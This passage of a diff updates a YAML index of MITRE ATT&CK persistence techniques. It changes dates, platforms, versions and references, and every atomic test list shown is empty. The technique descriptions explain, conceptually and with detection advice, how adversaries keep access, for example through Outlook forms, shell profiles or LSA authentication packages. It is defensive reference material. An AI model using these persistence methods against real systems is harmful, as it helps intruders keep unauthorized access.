-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -32834,22 +33223,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -32915,7 +33331,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -32989,11 +33404,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33010,7 +33424,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33020,7 +33433,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33029,19 +33442,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33089,11 +33500,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33122,24 +33534,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33174,9 +33588,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33236,7 +33647,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33261,13 +33672,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33320,8 +33729,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33369,78 +33778,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33488,6 +33830,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -33498,9 +33844,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -33509,8 +33859,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -33547,7 +33956,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33570,12 +33979,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -33653,41 +34061,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33696,27 +34074,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -33777,7 +34182,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -33821,7 +34225,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -33843,7 +34247,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -33924,7 +34327,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -33947,7 +34349,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -33977,12 +34379,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34072,12 +34472,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34162,7 +34561,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34227,18 +34625,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
